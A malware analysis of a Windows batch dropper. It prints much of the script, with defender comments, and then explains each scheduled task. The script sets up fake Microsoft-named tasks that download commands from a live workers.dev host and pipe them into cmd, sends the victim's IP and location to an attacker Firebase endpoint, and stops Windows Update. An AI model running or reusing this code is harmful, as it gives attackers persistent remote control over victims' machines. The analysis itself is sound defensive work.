echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp5.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp5.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp5.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp5.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp5.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp5.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp5.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp5.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp5.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp5.xml | |
echo ^</Settings^> >> C:\systemfile\temp5.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp5.xml | |
echo ^<Exec^> >> C:\systemfile\temp5.xml | |
REM Action: bare "curl" (resolved via PATH, see the system32 fallback above) fetches
REM https://autobat.alexrybak0444.workers.dev/ into %temp%\c4329f-4b8b33e-fa4fffe0.
REM Defender note: that hostname and the fixed temp file name are both IoCs; the
REM task's 9-minute cadence produces a regular beacon in proxy/DNS logs.
echo ^<Command^>curl^</Command^> >> C:\systemfile\temp5.xml | |
echo ^<Arguments^>https://autobat.alexrybak0444.workers.dev/ -o ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp5.xml | |
echo ^</Exec^> >> C:\systemfile\temp5.xml | |
echo ^</Actions^> >> C:\systemfile\temp5.xml | |
echo ^</Task^> >> C:\systemfile\temp5.xml | |
schtasks /create /xml "C:\systemfile\temp5.xml" /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /F | |
Del "C:\systemfile\temp5.xml" | |
REM ---- Task 6: \Microsoft\Windows\Servicing\ServiceCleanup ----
REM Execution half of the C2 channel: runs whatever Task 5 downloaded.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp6.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp6.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp6.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp6.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp6.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp6.xml | |
echo ^<URI^>\Microsoft\Windows\Servicing\ServiceCleanup^</URI^> >> C:\systemfile\temp6.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp6.xml | |
REM Trigger: logon + 8 s, then every 9 minutes (same period as Task 5, offset so
REM the download normally lands before this runs).
echo ^<Triggers^> >> C:\systemfile\temp6.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp6.xml | |
echo ^<Repetition^> >> C:\systemfile\temp6.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp6.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp6.xml | |
echo ^</Repetition^> >> C:\systemfile\temp6.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml | |
echo ^<Delay^>PT8S^</Delay^> >> C:\systemfile\temp6.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp6.xml | |
echo ^</Triggers^> >> C:\systemfile\temp6.xml | |
echo ^<Principals^> >> C:\systemfile\temp6.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp6.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp6.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp6.xml | |
echo ^</Principal^> >> C:\systemfile\temp6.xml | |
echo ^</Principals^> >> C:\systemfile\temp6.xml | |
echo ^<Settings^> >> C:\systemfile\temp6.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp6.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp6.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp6.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp6.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp6.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp6.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp6.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp6.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp6.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp6.xml | |
echo ^</Settings^> >> C:\systemfile\temp6.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp6.xml | |
echo ^<Exec^> >> C:\systemfile\temp6.xml | |
REM Action: "type %temp%\c4329f-4b8b33e-fa4fffe0 | cmd" executes the downloaded
REM text as cmd commands, and on success deletes it. Combined with Task 5 this
REM gives the operator arbitrary command execution every 9 minutes with no
REM persistent script on disk between runs.
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp6.xml | |
echo ^<Arguments^>/c type ^%temp^%\c4329f-4b8b33e-fa4fffe0 ^| cmd ^&^& del ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp6.xml | |
echo ^</Exec^> >> C:\systemfile\temp6.xml | |
echo ^</Actions^> >> C:\systemfile\temp6.xml | |
echo ^</Task^> >> C:\systemfile\temp6.xml | |
schtasks /create /xml "C:\systemfile\temp6.xml" /tn "\Microsoft\Windows\Servicing\ServiceCleanup" /F | |
Del "C:\systemfile\temp6.xml" | |
REM ---- Task 7: \Microsoft\Windows\Shell\ObjectTask ----
REM Housekeeping task: restarts Tasks 1 and 2 whenever a fresh command file from
REM Task 5 is present. Single logon trigger (7 s delay), no repetition.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp7.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp7.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp7.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp7.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp7.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp7.xml | |
echo ^<URI^>\Microsoft\Windows\Shell\ObjectTask^</URI^> >> C:\systemfile\temp7.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp7.xml | |
echo ^<Triggers^> >> C:\systemfile\temp7.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp7.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml | |
echo ^<Delay^>PT7S^</Delay^> >> C:\systemfile\temp7.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp7.xml | |
echo ^</Triggers^> >> C:\systemfile\temp7.xml | |
echo ^<Principals^> >> C:\systemfile\temp7.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp7.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp7.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp7.xml | |
echo ^</Principal^> >> C:\systemfile\temp7.xml | |
echo ^</Principals^> >> C:\systemfile\temp7.xml | |
echo ^<Settings^> >> C:\systemfile\temp7.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp7.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp7.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp7.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp7.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp7.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp7.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp7.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp7.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp7.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp7.xml | |
echo ^</Settings^> >> C:\systemfile\temp7.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp7.xml | |
echo ^<Exec^> >> C:\systemfile\temp7.xml | |
REM Action: if %temp%\c4329f-4b8b33e-fa4fffe0 exists, /End both VerifiedCert and
REM "Application Experience\Maintenance", /DISABLE them, then /ENABLE them again,
REM which forces a clean restart of the c.z runner and the hidden browser.
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp7.xml | |
echo ^<Arguments^>/c if exist ^%temp^%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN ^"\Microsoft\Windows\AppID\VerifiedCert^" ^& SCHTASKS /End /TN ^"\Microsoft\Windows\Application Experience\Maintenance^" ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /ENABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /ENABLE)^</Arguments^> >> C:\systemfile\temp7.xml | |
echo ^</Exec^> >> C:\systemfile\temp7.xml | |
echo ^</Actions^> >> C:\systemfile\temp7.xml | |
echo ^</Task^> >> C:\systemfile\temp7.xml | |
schtasks /create /xml "C:\systemfile\temp7.xml" /tn "\Microsoft\Windows\Shell\ObjectTask" /F | |
Del "C:\systemfile\temp7.xml" | |
REM ---- Task 8: \Microsoft\Windows\Clip\ServiceCleanup ----
REM Bootstrap task: runs c.z once per logon (5 min delay) until the Python bundle
REM has been extracted, then removes itself.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp8.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp8.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp8.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp8.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp8.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp8.xml | |
echo ^<URI^>\Microsoft\Windows\Clip\ServiceCleanup^</URI^> >> C:\systemfile\temp8.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp8.xml | |
echo ^<Triggers^> >> C:\systemfile\temp8.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp8.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml | |
echo ^<Delay^>PT5M^</Delay^> >> C:\systemfile\temp8.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp8.xml | |
echo ^</Triggers^> >> C:\systemfile\temp8.xml | |
echo ^<Principals^> >> C:\systemfile\temp8.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp8.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp8.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp8.xml | |
echo ^</Principal^> >> C:\systemfile\temp8.xml | |
echo ^</Principals^> >> C:\systemfile\temp8.xml | |
echo ^<Settings^> >> C:\systemfile\temp8.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp8.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp8.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp8.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp8.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp8.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp8.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp8.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp8.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp8.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp8.xml | |
echo ^</Settings^> >> C:\systemfile\temp8.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp8.xml | |
echo ^<Exec^> >> C:\systemfile\temp8.xml | |
REM Action: "more C:\systemfile\c.z | cmd" (same stdin-feed trick as Task 1), then
REM if C:\Windows\security\pywinvera\libs exists the task deletes itself, so it
REM disappears from the task list once the first-run setup has succeeded.
REM Defender note: on a cleaned host the absence of this task does NOT mean the
REM infection never ran; check for the other seven names and for pywinvera\libs.
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp8.xml | |
echo ^<Arguments^>/c more "C:\systemfile\c.z" ^| cmd ^& if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)^</Arguments^> >> C:\systemfile\temp8.xml | |
echo ^</Exec^> >> C:\systemfile\temp8.xml | |
echo ^</Actions^> >> C:\systemfile\temp8.xml | |
echo ^</Task^> >> C:\systemfile\temp8.xml | |
schtasks /create /xml "C:\systemfile\temp8.xml" /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F | |
Del "C:\systemfile\temp8.xml" | |
REM ---- Victim check-in ----
REM Fetch the host's public IP and geolocation JSON from ip-api.com into "widget",
REM escape the double quotes and replace spaces with underscores so the JSON
REM survives being passed as a single cmd argument, echo it locally, then POST it
REM to the attacker's Firebase Realtime Database
REM (ping-newdatabase-default-rtdb.firebaseio.com, path /Userinfo.json).
REM Defender note: two outbound IoCs here, the ip-api.com lookup immediately
REM followed by a POST to that firebaseio.com hostname. Data sent is the
REM ip-api response only (IP plus approximate location), nothing else from the host.
FOR /F "tokens=*" %a in ('curl.exe -L http://ip-api.com/json') do SET widget=%a | |
set widget=%widget:"=\"% | |
set widget=%widget: =_% | |
echo %widget% | |
curl.exe -X POST -d "%widget%" https://ping-newdatabase-default-rtdb.firebaseio.com/Userinfo.json | |
REM Stop the Windows Update service and set its start type to manual (demand).
REM Both sc.exe calls need administrative rights to take effect; on a workstation
REM this weakens patching, so recovery should include "sc.exe start wuauserv" and
REM restoring the start type (see the analysis comment on this page).
sc.exe stop wuauserv | |
sc.exe config wuauserv start=demand | |
Most of Stage 3 defines 8 tasks in "Task Scheduler". I've put the other stuff at the top here, even though some tasks are defined in earlier lines.
Line 1 kills this script instantly if your WinSystemLocale does not start with "en-".
Lines 5-6 make a directory called C:\systemfile and hide it. You can still open it by hitting "Win + R" and entering "C:\systemfile". The files inside are also hidden. Lines 148-193 create 3 files inside C:\systemfile.
Lines 357-359 make sure that curl is available. It comes from the attacker's repo, but is clean as of now. Lines 596-603 send the user's IP to the attacker's Firebase. It's safe to run 596-600 locally to see the data that you sent. It includes the IP and an approximate location down to city and ZIP code.
Lines 608/609 stop wuauserv (= Windows Update Service) and set it to start only manually. This actually seems to be the default. But you can start it by running
sc.exe start wuauserv
and set it to start on its own by selecting an option from <boot|system|auto|demand|disabled|delayed-auto> and running sc.exe config wuauserv start=<your option>
Tasks
Task 1 (lines 14-63): \Microsoft\Windows\AppID\VerifiedCert
This is run inside C:\systemfile. This task seems to execute what's inside C:\systemfile\c.z and then %USERPROFILE%\Downloads\c.z? Is it common to pipe more into cmd?
Task 2 (lines 75-132): \Microsoft\Windows\Application Experience\Maintenance
This tries to find the path to Chrome, Brave or Edge and then calls it with the following arguments:
This is run inside C:\systemfile. This runs a browser, with the user data in C:\systemfile. Probably hidden? Haven't checked all the flags yet.
--tyqe=render
mistype of --type=render. Probably mistyped on purpose to look like it is being rendered.
--fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072
should be --field-trial-handle (fieLd and only one dash). This looks like what Google sometimes does to enable different "Field Trials". Probably also mistyped on purpose.
--lang=en-US
sets language to American English
--extension--process
Marks a renderer as an extension process
--origin--trial-disabled--features=SecurePaymentConfirmation
Disables origin trials for SecurePaymentConfirmation
--device-scale--factor=1
should be --force-device-scale-factor=1; sets scaling of the UI.
--num--raster-threads=2
use two threads.--profile-directory=Default
useDefault
profile directory--enable--main-frame-before--activation www.google.com
`--renderer--client-id=6`
??
`--user-data-dir="C:\systemfile"`
Overrides the user data directory.
`--no-v8--untrusted-code-mitigations`
To do with this (?)
`--load-extension="C:\systemfile"`
Loads the malicious extension from `C:\systemfile`.
`--mojo--platform-channel-handle=-3784`
"In this mode, Chrome binds an Application request and can then connect to the “pure” Mojo services running in the shell around it." (?)
`/prefetch:1`
Doesn't really do anything.
Task 3 (lines 233-273): \Microsoft\Windows\Services\CertPathCheck
python -c "import base64;exec(base64.b64decode('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'))"
This is run inside `C:\Windows\security\pywinvera`.
Decoded:
Reads `obs.log`, base64-decodes it and executes the result. It stops Task 4 and kills Chrome and other processes running in session 0 ("user-less").
Task 4 (lines 279-319): also \Microsoft\Windows\Services\CertPathw
pythonw -c "import base64;exec(base64.b64decode('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'))"
This is run inside `C:\Windows\security\pywinvera`.
This script waits until Task Manager or a similar tool is started and then kills the hidden processes to hide them from the user.
Task 5 (lines 365-410): /Microsoft/Windows/Servicing/ComponentCleanup
cmd curl https://autobat[.]alexrybak0444[.]workers[.]dev/ -o %temp%\c4329f-4b8b33e-fa4fffe0
Downloads a file from that site and puts it into `%temp%\c4329f-4b8b33e-fa4fffe0`. As of right now this file only contains the placeholder text `asd`.
Task 6 (lines 419-465): /Microsoft/Windows/Servicing/ServiceCleanup
Runs the script downloaded in Task 5, then deletes it.
Task 7 (lines 478-520): /Microsoft/Windows/Shell/ObjectTask
If the file downloaded in Task 5 exists, it stops Task 1 and Task 2, disables them and then enables them again.
Task 8 (lines 535-577): /Microsoft/Windows/Clip/ServiceCleanup
Runs the contents of `C:\systemfile\c.z` and deletes this task if `C:\Windows\security\pywinvera\libs` exists.